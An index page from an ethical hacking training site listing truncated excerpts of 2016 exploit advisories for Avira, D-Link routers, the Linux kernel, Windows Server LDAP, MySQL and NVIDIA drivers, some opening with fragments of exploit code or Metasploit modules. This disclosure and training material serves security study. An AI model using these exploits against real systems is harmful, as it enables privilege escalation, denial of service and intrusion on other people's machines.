Exploits

Home » Exploits

Avira Antivirus 15.0.21.86 – ‘.zip’ Directory Traversal / Command Execution Exploit

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credit: R-73eN

# Title :  Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM)

# Tested on: Avira Antivirus 15.0.21.86 in Windows 7
# Vendor : https://www.avira.com/
# Disclosure Timeline:
# 2016-06-28 – Reported to Vendor through Bugcrowd.
# 2016-06-29 – Vendor Replied.
# 2016-07-05 – Vendor Replicated the vulnerability.
# 2016-09-02 – Vendor released updated […]

By |November 13th, 2016|Exploits|

Droid4X Privilege Escalation Vulnerability

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: CT-Zer0 Team
# Exploit Title: Droid4X Unquoted Service Path Privilege Escalation

# Category: local
# Vendor Homepage: http://www.droid4x.com/
# Software Link: http://dl.haima.me/download/DXDown/win/Z001/Droid4XInstaller.exe
# Tested on: Windows 7 x86/x64

1. Description

Droid4XService (Droid4XService.exe) installs as a service with
an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged […]

By |November 13th, 2016|Exploits|

DLink ADSL Router DSL-2750E SEA_1.07 Remote File Disclosure Vulnerability

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Todor Donev
#!/bin/sh
#
#  D-Link ADSL ROUTER DSL-2750E SEA_1.07
#  Remote File Disclosure
#
#  Modem Name:               DSL-2750E
#  Firmware Version:         SEA_1.07

#
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor […]

By |November 13th, 2016|Exploits|

Linux Kernel – TCP Related Read Use-After-Free Exploit

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Marco Grassi

#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <stdio.h>
 
#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_sendmsg
#define SYS_sendmsg 46
#endif
#ifndef SYS_recvfrom
#define SYS_recvfrom 45
#endif
#ifndef SYS_write
#define SYS_write 1
#endif
 
long r;
 
 
int main(int argc, char **argv)
{
    while (1) {
        pid_t pid = fork();
 
        if […]

By |November 13th, 2016|Exploits|

Microsoft Windows Server 2008 / 2012 – LDAP RootDSE Netlogon Denial Of Service (PoC)

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credit: Todor Donev
#!/usr/bin/perl
#
#  MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon
#  (CLDAP “AD Ping”) query reflection DoS PoC
#

#
#  MS Windows Server 2016      
#
#  Description:
#  The attacker  sends a simple query to a vulnerable reflector
#  supporting the Connectionless LDAP […]

By |November 13th, 2016|Exploits|

Android Proxy Auto Config (PAC) Crash Vulnerability

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Yakov Shafranovich
Summary

Android devices can be crashed forcing a halt and then a soft reboot
by downloading a large proxy auto config (PAC) file when adjusting the
Android networking settings. This can also be exploited by an MITM
attacker that can intercept and replace the PAC file. However, the […]

By |November 13th, 2016|Exploits|

Microsoft Internet Explorer WININET.dll

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: SkyLined
Synopsis
 
A specially crafted HTTP response can cause the CHttp­Header­Parser::Parse­Status­Line method in WININET to read data beyond the end of a buffer. The size of the read can be controlled through the HTTP response. An attacker that is able to get any application that uses WININET […]

By |November 13th, 2016|Exploits|

Linux Kernel (Ubuntu / Fedora / Redhat) – ‘Overlayfs’ Privilege Escalation Exploit – Metasploit Code

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require “msf/core”
 
class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking
 
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
        ‘Name’           => ‘Overlayfs Privilege Escalation’,
        ‘Description’    => %q{
          This module attempts to exploit two different CVEs related to overlayfs.
          CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55
                                            3.16.0-25 […]

By |November 3rd, 2016|Exploits|

MySQL / MariaDB / PerconaDB – ‘root’ Privilege Escalation Vulnerability – Metasploit Code

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Dawid
I. VULNERABILITY
————————-
 
MariaDB / MySQL / PerconaDB   –   Root Privilege Escalation
 
MySQL 
    <= 5.5.51
    <= 5.6.32
    <= 5.7.14
 
MariaDB
    All current
 
Percona Server
    < 5.5.51-38.2
    < 5.6.32-78-1
    < 5.7.14-8
 
Percona XtraDB Cluster
    < 5.6.32-25.17
    < 5.7.14-26.17
    < 5.5.41-37.0
 
 
II. BACKGROUND
————————-
 
MySQL:
 
“MySQL is the world’s most popular open source database.
Whether you are a fast growing web property, technology ISV or large
enterprise, MySQL […]

By |November 3rd, 2016|Exploits|

NVIDIA Driver – NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Priv

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

The NvStreamKms.sys driver calls PsSetCreateProcessNotifyRoutineEx to set up a
process creation notification routine.
 
In this particular routine,
 
if ( cur->image_names_count > 0 ) {
  // info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine.
  image_filename = info_->ImageFileName;
  buf = image_filename->Buffer;
  if ( buf )
  {
    if ( !v5 )
    {
      i = 0i64;
      num_chars = image_filename->Length […]

By |November 3rd, 2016|Exploits|